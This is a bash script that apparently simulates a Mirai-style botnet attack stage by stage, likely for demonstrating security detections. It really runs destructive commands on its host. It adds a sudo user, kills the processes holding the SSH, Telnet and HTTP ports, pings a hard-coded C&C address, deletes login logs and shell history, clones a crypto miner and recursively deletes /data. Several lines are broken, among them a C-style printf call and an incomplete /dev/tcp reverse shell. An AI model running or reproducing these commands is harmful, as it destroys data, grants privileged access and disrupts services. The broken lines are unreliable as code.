Untitled

#!/bin/bash
# Running from within the attacked device

# Local host reconnaissance detected
echo "###################################################################"
echo "      Conducting Reconnaissance                                    "
echo "###################################################################"

    echo "Conducting analysis of host data..."
    uname -a
    echo "Got host data"
    read -p "Press enter to continue attack"

# Detected suspicious use of the useradd command
echo "###################################################################"
echo "      Create User and Escalate Privilege                           "
echo "###################################################################"

    USER="privilegeduser"${RANDOM}""

    echo "Adding user named ${USER} with privilege root to the system..."
    useradd $USER
    sudo usermod -aG sudo $USER
    echo "Successfully added user named /"${USER}/" with privilege root to the system"
    read -p "Press enter to continue attack"

# Process running on multiple ports, Process killing other processes
echo "###################################################################"
echo "      Kill SSH, Telnet and HTTP to hijack ports 23, 22, 80         "
echo "            Original logs from Mirai killer.c actor                "
echo "###################################################################"

    # port 23
    echo "[killer] Trying to kill port 23"
    echo "[killer] Finding and killing processes holding port 23"
    kill -9 $(lsof -i:23 -t) 2> /dev/null
    echo "[killer] Killed tcp/23 (telnet)"
    # insert connect to port
    echo "[killer] Bound to tcp/23 (Telnet)\n"

    # port 22
    echo "[killer] Trying to kill port 22"
    echo "[killer] Finding and killing processes holding port 22"
    kill -9 $(lsof -i:22 -t) 2> /dev/null
    echo "[killer] Killed tcp/22 (SSH)"
    # insert connect to port
    echo "[killer] Bound to tcp/22 (SSH)\n"

    # port 80
    echo "[killer] Trying to kill port 80"
    echo "[killer] Finding and killing processes holding port 80"
    kill -9 $(lsof -i:80 -t) 2> /dev/null
    echo "[killer] Killed tcp/80 (http)"
    # insert connect to port
    echo "[killer] Bound to tcp/80 (http)\n"
    read -p "Press enter to continue attack"


echo "###################################################################"
echo "      Find and Kill Competing Malware                              "
echo "###################################################################"

    echo "Looking for competing malware..."
    kill -9 $(pgrep anime) 2> /dev/null
    echo "Killing .anime malware process..."
    echo "[killer] Finished"
    read -p "Press enter to continue attack"


echo "###################################################################"
echo "      Scan The Network for More Volunrable Devices                 "
echo "        Original logs from Mirai scanner.c actor                   "
echo "###################################################################"

    printf("[scanner] Scanner process initialized. Scanning started..."
    IPCIDR=13.92.249.
    for ((i=0; i<20; i++))
    do
        IP=$IPCIDR${i}
        echo "pinging ${IP}"
        ping -c3 $IP
    done
    read -p "Press enter to continue attack"

# Reverse shells, Suspicious IP address communication, Possible backdoor detected
echo "###################################################################"
echo "      Communicating with CnC for getting attack commands           "
echo "###################################################################"

    echo "Setting up a backdoor..."
    touch d-bus notifier
    echo "Backdoor set up"

    echo "Opening reverse shell..."
    bash /dev/tcp/
    echo "Reverse shell established"

    echo "Communicating with CnC server..."
    ping -c3 110.249.212.46 > pingtoCnC.txt
    echo "Listening to CnC for future attack commands..."
    read -p "Press enter to continue attack"


# Removal of system logs files detected, Potential overriding of common files,
echo "###################################################################"
echo "      Covering Tracks - Deleting Logs and Executables"
echo "###################################################################"


    echo "Removing system logs..."
    rm /var/log/lastlog
    echo "Removed system logs"

    echo "Overriding linux system files..."
    cp /bin/netstat a
    echo "Overrode linux system files"

    echo "Deleting history files..."
    history -c
    echo "Deleted history files"
    read -p "Press enter to continue attack"


echo "*******************************************************************"
echo "*******************************************************************"
echo "         Mirai Botnet Expansion Scenarios                          "
echo "*******************************************************************"
echo "*******************************************************************"
    read -p "Press enter to continue attack"


# Crypto Coin Miner
echo "###################################################################"
echo "  Mirai Variant - Mining Crypto Currency Using the Botnet          "
echo "###################################################################"

    echo "Setting up crypto miner..."
    git clone https://github.com/cpuminer
    echo "Mining crypto with device resources"
    read -p "Press enter to continue attack"

# Possible loss of data detected
echo "###################################################################"
echo "   Fish Tank Scenario - Egress Data Through IoT Device             "
echo "###################################################################"

    echo "Sending data collected through the device..."
    rm -rf /data/
    echo "Sent data"
    read -p "Press enter to continue attack"